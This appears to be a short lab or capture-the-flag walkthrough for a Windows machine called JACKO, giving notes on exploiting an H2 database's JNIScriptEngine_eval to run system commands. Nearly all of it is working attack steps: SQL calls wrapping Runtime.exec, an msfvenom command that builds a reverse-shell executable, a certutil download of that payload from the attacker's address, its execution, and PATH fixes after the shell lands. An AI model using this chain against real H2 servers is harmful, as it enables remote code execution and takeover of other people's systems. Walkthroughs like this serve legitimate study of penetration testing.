4 H2 JNIScriptEngine exploit > tony
# run shell
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd.exe /c C:\\Users\\Tony\\Documents\\kashz.exe").getInputStream()).useDelimiter("\\Z").next()');
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("systeminfo").getInputStream()).useDelimiter("\\Z").next()');
Host Name: JACKO
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.18363 N/A Build 18363
Registered Owner: tony
System Type: x64-based PC
Hotfix(s): 9 Hotfix(s) Installed.
# shell
# use port that is open
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.105 LPORT=8082 -f exe -o kashz.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: kashz.exe
# download shell
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("certutil.exe -urlcache -f http://192.168.49.105/kashz.exe C:\\Users\\Tony\\Documents\\kashz.exe").getInputStream()).useDelimiter("\\Z").next()');
# call shell
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd.exe /c C:\\Users\\Tony\\Documents\\kashz.exe").getInputStream()).useDelimiter("\\Z").next()');
# cant find powershell or anything
echo %path%
C:\Users\tony\AppData\Local\Microsoft\WindowsApps
# update %PATH%
# cmd
set PATH=%PATH%;C:\Windows\System32\;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\wbem\;
# powershell
$env:Path += ";C:\Windows\System32\;C:\Windows\System32\WindowsPowerShell\v1.0\"
Last updated